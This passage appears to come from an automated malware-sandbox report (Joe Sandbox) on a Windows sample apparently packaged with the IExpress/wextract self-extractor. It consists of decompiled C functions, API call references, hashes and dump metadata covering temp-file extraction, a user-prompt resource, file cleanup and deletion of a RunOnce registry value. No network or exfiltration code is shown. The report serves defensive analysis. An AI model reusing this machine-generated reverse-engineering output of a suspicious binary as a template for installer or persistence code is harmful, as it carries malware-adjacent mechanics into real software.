                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xe788b0 = _t58;
                                                                                                                                                                                                      							_t37 = E00E76C3F(0xe710b8, 0xe710c4); // executed
                                                                                                                                                                                                      							__eflags = _t37;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      								_t30 = 0xff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(0x1f);
                                                                                                                                                                                                      						L00E76FF4();
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t68 =  *0xe788b0 - _t58; // 0x2
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_push(0xe710b4);
                                                                                                                                                                                                      							_push(0xe710ac);
                                                                                                                                                                                                      							L00E77202();
                                                                                                                                                                                                      							 *0xe788b0 = 2;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(_t53 == 0) {
                                                                                                                                                                                                      							 *0xe788ac = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t71 =  *0xe788b4;
                                                                                                                                                                                                      						if( *0xe788b4 != 0 && E00E77060(_t71, 0xe788b4) != 0) {
                                                                                                                                                                                                      							_t60 =  *0xe788b4; // 0x0
                                                                                                                                                                                                      							 *0xe7a288(0, 2, 0);
                                                                                                                                                                                                      							 *_t60();
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t25 = __imp___acmdln; // 0x76665b9c
                                                                                                                                                                                                      						_t59 =  *_t25;
                                                                                                                                                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t41 =  *_t59;
                                                                                                                                                                                                      							if(_t41 > 0x20) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							if(_t41 != 0) {
                                                                                                                                                                                                      								if(_t54 != 0) {
                                                                                                                                                                                                      									goto L32;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                      										_t59 = _t59 + 1;
                                                                                                                                                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      										_t41 =  *_t59;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t29 = 0xa;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(_t29);
                                                                                                                                                                                                      							_t30 = E00E72BFB(0xe70000, 0, _t59); // executed
                                                                                                                                                                                                      							 *0xe781e0 = _t30;
                                                                                                                                                                                                      							__eflags =  *0xe781f8;
                                                                                                                                                                                                      							if( *0xe781f8 == 0) {
                                                                                                                                                                                                      								exit(_t30); // executed
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *0xe781e4;
                                                                                                                                                                                                      							if( *0xe781e4 == 0) {
                                                                                                                                                                                                      								__imp___cexit();
                                                                                                                                                                                                      								_t30 =  *0xe781e0; // 0x80070002
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      							goto L40;
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							__eflags = _t41 - 0x22;
                                                                                                                                                                                                      							if(_t41 == 0x22) {
                                                                                                                                                                                                      								__eflags = _t54;
                                                                                                                                                                                                      								_t15 = _t54 == 0;
                                                                                                                                                                                                      								__eflags = _t15;
                                                                                                                                                                                                      								_t54 = 0 | _t15;
                                                                                                                                                                                                      								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                      							__imp___ismbblead(_t26);
                                                                                                                                                                                                      							__eflags = _t26;
                                                                                                                                                                                                      							if(_t26 != 0) {
                                                                                                                                                                                                      								_t59 = _t59 + 1;
                                                                                                                                                                                                      								__eflags = _t59;
                                                                                                                                                                                                      								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t59 = _t59 + 1;
                                                                                                                                                                                                      							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L40:
                                                                                                                                                                                                      					return E00E7724D(_t30);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t58 = 1;
                                                                                                                                                                                                      				__eflags = 1;
                                                                                                                                                                                                      				goto L7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00e76b57
                                                                                                                                                                                                      0x00e76b5f
                                                                                                                                                                                                      0x00e76b65
                                                                                                                                                                                                      0x00e76b65
                                                                                                                                                                                                      0x00e76b67
                                                                                                                                                                                                      0x00e76b6c
                                                                                                                                                                                                      0x00e76b6e
                                                                                                                                                                                                      0x00e76b71
                                                                                                                                                                                                      0x00e76b74
                                                                                                                                                                                                      0x00e76b74
                                                                                                                                                                                                      0x00e76b79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76b7d
                                                                                                                                                                                                      0x00e76b81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76b83
                                                                                                                                                                                                      0x00e76b8c
                                                                                                                                                                                                      0x00e76b8d
                                                                                                                                                                                                      0x00e76b90
                                                                                                                                                                                                      0x00e76b90
                                                                                                                                                                                                      0x00e76b83
                                                                                                                                                                                                      0x00e76b81
                                                                                                                                                                                                      0x00e76b94
                                                                                                                                                                                                      0x00e76b98
                                                                                                                                                                                                      0x00e76ba2
                                                                                                                                                                                                      0x00e76b9a
                                                                                                                                                                                                      0x00e76b9a
                                                                                                                                                                                                      0x00e76b9a
                                                                                                                                                                                                      0x00e76ba3
                                                                                                                                                                                                      0x00e76bab
                                                                                                                                                                                                      0x00e76bb0
                                                                                                                                                                                                      0x00e76bb5
                                                                                                                                                                                                      0x00e76bbc
                                                                                                                                                                                                      0x00e76bbf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76bbf
                                                                                                                                                                                                      0x00e76c1e
                                                                                                                                                                                                      0x00e76c25
                                                                                                                                                                                                      0x00e76c27
                                                                                                                                                                                                      0x00e76c2d
                                                                                                                                                                                                      0x00e76c2d
                                                                                                                                                                                                      0x00e76c32
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76bc5
                                                                                                                                                                                                      0x00e76bc5
                                                                                                                                                                                                      0x00e76bc8
                                                                                                                                                                                                      0x00e76bcc
                                                                                                                                                                                                      0x00e76bce
                                                                                                                                                                                                      0x00e76bce
                                                                                                                                                                                                      0x00e76bd1
                                                                                                                                                                                                      0x00e76bd3
                                                                                                                                                                                                      0x00e76bd3
                                                                                                                                                                                                      0x00e76bd6
                                                                                                                                                                                                      0x00e76bda
                                                                                                                                                                                                      0x00e76be1
                                                                                                                                                                                                      0x00e76be3
                                                                                                                                                                                                      0x00e76be5
                                                                                                                                                                                                      0x00e76be5
                                                                                                                                                                                                      0x00e76be6
                                                                                                                                                                                                      0x00e76be6
                                                                                                                                                                                                      0x00e76be9
                                                                                                                                                                                                      0x00e76bea
                                                                                                                                                                                                      0x00e76bea
                                                                                                                                                                                                      0x00e76b74
                                                                                                                                                                                                      0x00e76c39
                                                                                                                                                                                                      0x00e76c3e
                                                                                                                                                                                                      0x00e76c3e
                                                                                                                                                                                                      0x00e76abe
                                                                                                                                                                                                      0x00e76abe
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E77155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E77182
                                                                                                                                                                                                        • Part of subcall function 00E77155: GetCurrentProcessId.KERNEL32 ref: 00E77191
                                                                                                                                                                                                        • Part of subcall function 00E77155: GetCurrentThreadId.KERNEL32 ref: 00E7719A
                                                                                                                                                                                                        • Part of subcall function 00E77155: GetTickCount.KERNEL32 ref: 00E771A3
                                                                                                                                                                                                        • Part of subcall function 00E77155: QueryPerformanceCounter.KERNEL32(?), ref: 00E771B8
                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,00E772B8,00000058), ref: 00E76A7F
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00E76AB4
                                                                                                                                                                                                      • _amsg_exit.MSVCRT ref: 00E76AC9
                                                                                                                                                                                                      • _initterm.MSVCRT ref: 00E76B1D
                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00E76B49
                                                                                                                                                                                                      • exit.KERNELBASE ref: 00E76BBF
                                                                                                                                                                                                      • _ismbblead.MSVCRT ref: 00E76BDA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836923961-0
                                                                                                                                                                                                      • Opcode ID: 6ed40530b07478b378ed04737f4b6998e04c0ab14e8eda59030e03a091de18b0
                                                                                                                                                                                                      • Instruction ID: 6eb9ebac67838eb8a951b96dde579978801ff9f4b4afc81be683e09b193ba5e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ed40530b07478b378ed04737f4b6998e04c0ab14e8eda59030e03a091de18b0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3411470944B65CFEB25DB69DD097A97BE0EB45729F54E02AE84DF32A1CF304C848B81
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 631 e758c8-e758d5 632 e758d8-e758dd 631->632 632->632 633 e758df-e758f1 LocalAlloc 632->633 634 e758f3-e75901 call e744b9 633->634 635 e75919-e75959 call e71680 call e7658a CreateFileA LocalFree 633->635 638 e75906-e75910 call e76285 634->638 635->638 645 e7595b-e7596c CloseHandle GetFileAttributesA 635->645 644 e75912-e75918 638->644 645->638 646 e7596e-e75970 645->646 646->638 647 e75972-e7597b 646->647 647->644
                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00E758C8(intOrPtr* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				signed char _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                                                                      				CHAR* _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                                                                      				_t23 = __ecx + 1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t6 =  *_t27;
                                                                                                                                                                                                      					_t27 = _t27 + 1;
                                                                                                                                                                                                      				} while (_t6 != 0);
                                                                                                                                                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                      				if(_t20 != 0) {
                                                                                                                                                                                                      					E00E71680(_t20, _t36, _t33);
                                                                                                                                                                                                      					E00E7658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                      					_v8 = _t10;
                                                                                                                                                                                                      					LocalFree(_t20);
                                                                                                                                                                                                      					_t12 = _v8;
                                                                                                                                                                                                      					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						CloseHandle(_t12);
                                                                                                                                                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xe79124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00E744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					 *0xe79124 = E00E76285();
                                                                                                                                                                                                      					_t14 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                                      			}














                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E75534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E758E7
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E75534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75943
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00E75534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7594D
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00E75534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7595C
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E75534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75963
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                      • API String ID: 747627703-3104274291
                                                                                                                                                                                                      • Opcode ID: c58a7fb9040f4e0bb3a04d4173957b384e03ce40cc017ade6f1d8f8aa7b8a28d
                                                                                                                                                                                                      • Instruction ID: c018252c0a89fd4da37e763c2480704161def7a82ad08dd1b54e5fc64975f621
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c58a7fb9040f4e0bb3a04d4173957b384e03ce40cc017ade6f1d8f8aa7b8a28d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC1138727013116BD7249F7A6C0DB9B7F9DDFC6364B109A25F61DF31D1DAB0884982A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E751E5(void* __eflags) {
                                                                                                                                                                                                      				int _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = E00E7468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				if(_t28 != 0) {
                                                                                                                                                                                                      					if(E00E7468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                      						if(_t5 != 0) {
                                                                                                                                                                                                      							_t6 = E00E744B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                      							LocalFree(_t28);
                                                                                                                                                                                                      							if(_t6 != 6) {
                                                                                                                                                                                                      								 *0xe79124 = 0x800704c7;
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *0xe79124 = 0;
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t28);
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E00E744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree(_t28);
                                                                                                                                                                                                      					 *0xe79124 = 0x80070714;
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00E744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xe79124 = E00E76285();
                                                                                                                                                                                                      				goto L10;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E72F4D,?,00000002,00000000), ref: 00E75201
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00E75250
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                        • Part of subcall function 00E76285: GetLastError.KERNEL32(00E75BBC), ref: 00E76285
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$UPROMPT
                                                                                                                                                                                                      • API String ID: 957408736-2980973527
                                                                                                                                                                                                      • Opcode ID: 66896982570a378043d1d58ec5fb7b94f0ed5979f9c7aa2c9dca03a649d7e6ba
                                                                                                                                                                                                      • Instruction ID: 954ffcaec4da066fa06f8230854dbf879a2098437f38794e95d8b4004e3c42a6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66896982570a378043d1d58ec5fb7b94f0ed5979f9c7aa2c9dca03a649d7e6ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD11D3B22016416FE314ABB25C45F3B61EDDBC9344B51D439B60EF51E2EAB98C405124
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                      			E00E752B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR** _t31;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 = __edi;
                                                                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_t31 =  *0xe791e0; // 0x8f8208
                                                                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t29 = _t31;
                                                                                                                                                                                                      						if( *0xe78a24 == 0 &&  *0xe79a30 == 0) {
                                                                                                                                                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                      							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t31 = _t31[1];
                                                                                                                                                                                                      						LocalFree( *_t29);
                                                                                                                                                                                                      						LocalFree(_t29);
                                                                                                                                                                                                      					} while (_t31 != 0);
                                                                                                                                                                                                      					_pop(_t28);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 =  *0xe78a20; // 0x0
                                                                                                                                                                                                      				_pop(_t32);
                                                                                                                                                                                                      				if(_t11 != 0 &&  *0xe78a24 == 0 &&  *0xe79a30 == 0) {
                                                                                                                                                                                                      					_push(_t22);
                                                                                                                                                                                                      					E00E71781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                      					if(( *0xe79a34 & 0x00000020) != 0) {
                                                                                                                                                                                                      						E00E765E8( &_v268);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                      					_t22 =  &_v268;
                                                                                                                                                                                                      					E00E72390( &_v268);
                                                                                                                                                                                                      					_t11 =  *0xe78a20; // 0x0
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *0xe79a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                      					_t11 = E00E71FE1(_t22); // executed
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *0xe78a20 =  *0xe78a20 & 0x00000000;
                                                                                                                                                                                                      				return E00E76CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(008F8208,00000080,?,00000000), ref: 00E752F2
                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(008F8208), ref: 00E752FA
                                                                                                                                                                                                      • LocalFree.KERNEL32(008F8208,?,00000000), ref: 00E75305
                                                                                                                                                                                                      • LocalFree.KERNEL32(008F8208), ref: 00E7530C
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(00E711FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E75363
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E75334
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      • API String ID: 2833751637-1193786559
                                                                                                                                                                                                      • Opcode ID: 4c16db5e0850d118587f83cb6dc5e1b510eed524e9bbf0a62496c856059bf580
                                                                                                                                                                                                      • Instruction ID: 2de5d37148f6a19531a8ec5dac15f359dab0a699c26e67539668ca3db4201cb2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c16db5e0850d118587f83cb6dc5e1b510eed524e9bbf0a62496c856059bf580
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE21CD32501A04EFDB24EB26ED09B6977B0AB50359F04A569E88E761B5CBF05CC8CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E71FE1(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				if( *0xe78530 != 0) {
                                                                                                                                                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                      					if(_t4 == 0) {
                                                                                                                                                                                                      						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                      						return RegCloseKey(_v8);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00E7538C,?,?,00E7538C), ref: 00E72005
                                                                                                                                                                                                      • RegDeleteValueA.KERNELBASE(00E7538C,wextract_cleanup0,?,?,00E7538C), ref: 00E72017
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00E7538C,?,?,00E7538C), ref: 00E72020
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
